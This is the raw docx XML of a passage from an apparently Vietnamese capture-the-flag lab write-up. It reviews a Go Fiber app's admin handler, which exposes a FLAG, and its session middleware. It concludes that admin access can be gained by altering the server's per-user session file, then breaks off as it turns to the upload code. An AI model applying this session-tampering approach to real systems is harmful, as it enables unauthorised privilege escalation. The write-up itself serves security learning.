          <w:p w14:paraId="4143C311" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F9F427C" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC66AAE" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F79B09" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07036BA2" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2944E4A5" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="530449A9" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="668AA951" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="708E68DB" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="225990FF" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="611C4ECA" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16079884" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C72C078" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:lastRenderedPageBreak/>
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="194E7E22" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73499D37" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A213007" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="163C6FDC" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:lastRenderedPageBreak/>
              <w:t>func DesireIsEnigma(c *fiber.Ctx) error {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="279C134E" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
              <w:t>user := c.Locals(</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"user"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="299D5CA5" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> user == nil {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14F80075" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> utils.ErrorResponse(c, </w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"User not found"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t>, http.StatusForbidden)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09364C2B" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0314C1ED" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4E604C55" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
              <w:t>userStruct, ok := user.(User)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F5D2B4D" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> !ok {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14531253" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> c.SendStatus(http.StatusInternalServerError)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F2BC77" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6834F18D" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5223A3A2" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> userStruct.Role == </w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"admin"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C496FE5" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> c.Render(</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"admin"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t>, fiber.Map{</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"FLAG"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t>: os.Getenv(</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"FLAG"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t>)})</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68566933" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="560EAE88" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t xml:space="preserve"> utils.ErrorResponse(c, </w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"You are not admin !"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C305AB">
              <w:t>, http.StatusForbidden)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C4A6B8E" w14:textId="77777777" w:rsidR="00C305AB" w:rsidRPr="00C305AB" w:rsidRDefault="00C305AB" w:rsidP="00C305AB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C305AB">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AADF0B5" w14:textId="305C4A0C" w:rsidR="00FB0B30" w:rsidRDefault="00FB0B30" w:rsidP="00527195">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15493806" w14:textId="60C30757" w:rsidR="00893313" w:rsidRPr="00527195" w:rsidRDefault="00F64A83" w:rsidP="00527195">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm này </w:t>
      </w:r>
      <w:r w:rsidR="0085778E">
        <w:t xml:space="preserve">có đoạn đoạn code cho thấy nó sẽ kiểm tra role của user và nếu </w:t>
      </w:r>
      <w:r w:rsidR="00CB12BE">
        <w:t xml:space="preserve">role là admin thì </w:t>
      </w:r>
      <w:r w:rsidR="00893313">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00893313" w:rsidRPr="00893313">
        <w:t xml:space="preserve">ệ thống sẽ render trang </w:t>
      </w:r>
      <w:r w:rsidR="00893313">
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00893313" w:rsidRPr="00893313">
        <w:t xml:space="preserve"> và truyền biến môi trường </w:t>
      </w:r>
      <w:r w:rsidR="00893313">
        <w:t>FLAG</w:t>
      </w:r>
      <w:r w:rsidR="00893313" w:rsidRPr="00893313">
        <w:t xml:space="preserve"> vào giao diện</w:t>
      </w:r>
      <w:r w:rsidR="00893313">
        <w:t>. Đ</w:t>
      </w:r>
      <w:r w:rsidR="00893313" w:rsidRPr="00893313">
        <w:t>ây chính là flag cần tìm trong lab.</w:t>
      </w:r>
      <w:r w:rsidR="00893313">
        <w:t xml:space="preserve"> Và đọc ngược lên trên ta có thể thấy </w:t>
      </w:r>
      <w:r w:rsidR="001B11C3">
        <w:t>giá trị role được lấy từ c.Local(‘user’), nên mình sẽ tìm thêm thông tin</w:t>
      </w:r>
      <w:r w:rsidR="002B5D42">
        <w:t xml:space="preserve"> về phần này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7684E440" w14:textId="5ABB8B7F" w:rsidR="00527195" w:rsidRDefault="002B5D42">
      <w:r>
        <w:t xml:space="preserve">Khi kiểm tra trong file main.go, mình phát hiện dòng code này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7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="004D3AC1" w:rsidRPr="004D3AC1" w14:paraId="5B18668F" w14:textId="77777777" w:rsidTr="004D3AC1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E2D5E91" w14:textId="77777777" w:rsidR="004D3AC1" w:rsidRPr="004D3AC1" w:rsidRDefault="004D3AC1" w:rsidP="004D3AC1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D3AC1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D50AD62" w14:textId="2D34B845" w:rsidR="004D3AC1" w:rsidRPr="004D3AC1" w:rsidRDefault="004D3AC1" w:rsidP="004D3AC1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D3AC1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>authenticatedGroup := app.Group(</w:t>
            </w:r>
            <w:r w:rsidRPr="004D3AC1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/user"</w:t>
            </w:r>
            <w:r w:rsidRPr="004D3AC1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>, services.SessionMiddleware)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="173DB137" w14:textId="57D07ED1" w:rsidR="00D60413" w:rsidRDefault="00D60413" w:rsidP="00C34835">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dòng này cho thấy rằng </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60413">
        <w:t>ứng dụng sử dụng Fiber framework trong Go và đang tạo một nhóm route</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Group với tiền tố /user. Tất cả route </w:t>
      </w:r>
      <w:r w:rsidR="00C34835">
        <w:t>bắt đầu bằng /user sẽ bị kiểm tra session trước khi xử lý</w:t>
      </w:r>
      <w:r w:rsidR="00E04875">
        <w:t xml:space="preserve"> thông qua hàm SessionMiddleware. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE5B49E" w14:textId="56E21D4E" w:rsidR="00E04875" w:rsidRDefault="00E04875" w:rsidP="00C34835">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Như đã </w:t>
      </w:r>
      <w:r w:rsidR="00BE0617">
        <w:t xml:space="preserve">nói qua trong </w:t>
      </w:r>
      <w:r w:rsidR="003E605B">
        <w:t xml:space="preserve">phần review source code, hàm này sẽ lấy cookie </w:t>
      </w:r>
      <w:r w:rsidR="00CB6820">
        <w:t xml:space="preserve">session </w:t>
      </w:r>
      <w:r w:rsidR="003E605B">
        <w:t xml:space="preserve">và username từ </w:t>
      </w:r>
      <w:r w:rsidR="00CB6820">
        <w:t xml:space="preserve">request. Tuy nhiên giá trị này chỉ để kiểm tra xem có rỗng hay không, còn giá trị session thực sự được sử </w:t>
      </w:r>
      <w:r w:rsidR="0047344D">
        <w:t>dùng</w:t>
      </w:r>
      <w:r w:rsidR="00CB6820">
        <w:t xml:space="preserve"> và lưu </w:t>
      </w:r>
      <w:r w:rsidR="00344FB3">
        <w:t xml:space="preserve">trong .Locals sẽ được lấy </w:t>
      </w:r>
      <w:r w:rsidR="0047344D">
        <w:t xml:space="preserve">từ hàm </w:t>
      </w:r>
      <w:r w:rsidR="00FF2B47">
        <w:t xml:space="preserve">GetSession. </w:t>
      </w:r>
      <w:r w:rsidR="00C41045">
        <w:t xml:space="preserve">Hàm GetSession sẽ lấy giá tri </w:t>
      </w:r>
      <w:r w:rsidR="00D8384D">
        <w:t>sessionID</w:t>
      </w:r>
      <w:r w:rsidR="00C41045">
        <w:t xml:space="preserve"> từ </w:t>
      </w:r>
      <w:r w:rsidR="00D8384D">
        <w:t>sessionID</w:t>
      </w:r>
      <w:r w:rsidR="00C41045">
        <w:t xml:space="preserve"> được lưu trên redis khi đăng nhập và đọc </w:t>
      </w:r>
      <w:r w:rsidR="00D8384D">
        <w:t>file /tmp/sessions/{</w:t>
      </w:r>
      <w:r w:rsidR="00E423A6">
        <w:t>username}/sessionID</w:t>
      </w:r>
      <w:r w:rsidR="00777FDB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E423A6">
        <w:t xml:space="preserve">rồi sẽ trả </w:t>
      </w:r>
      <w:r w:rsidR="008765E8">
        <w:t>về hàm SessionMiddleware và lưu trong c.Locals để dùng xác thực role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5821132C" w14:textId="0AF7AC31" w:rsidR="008765E8" w:rsidRDefault="008765E8" w:rsidP="00C34835">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Từ phân tích trên, </w:t>
      </w:r>
      <w:r w:rsidR="00777FDB">
        <w:t xml:space="preserve">chỉ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">có thể thực </w:t>
      </w:r>
      <w:r w:rsidR="00777FDB">
        <w:t xml:space="preserve">hiện truy cập vào /admin bằng cách sửa đổi file </w:t>
      </w:r>
      <w:r w:rsidR="00777FDB">
        <w:t>/tmp/sessions/{username}/</w:t>
      </w:r>
      <w:r w:rsidR="00F02320">
        <w:t>sessionID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD6826B" w14:textId="28DBE54A" w:rsidR="005401D9" w:rsidRDefault="005401D9" w:rsidP="00C34835">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tiếp tục đọc đoạn source code liên quan đến </w:t>
      </w:r>
      <w:r w:rsidR="00D6670F">
        <w:t>upload</w:t>
      </w:r>
      <w:r w:rsidR="00A15427">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D6670F">
        <w:t>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706"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D6670F" w:rsidRPr="00D6670F" w14:paraId="284B9B85" w14:textId="77777777" w:rsidTr="00D6670F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5739E53A" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00716084">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="631BC413" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B3DFD38" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="542831E6" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="250F1541" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EAF2A24" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30F08484" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="161882D7" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45601F23" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="139761ED" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31947D44" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28966E13" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E09969C" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:lastRenderedPageBreak/>
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40E3B1FE" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A303683" w14:textId="77777777" w:rsidR="00D6670F" w:rsidRPr="00D6670F" w:rsidRDefault="00D6670F" w:rsidP="00D6670F">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00D6670F">
              <w:t>15</w:t>
            </w:r>
          </w:p>
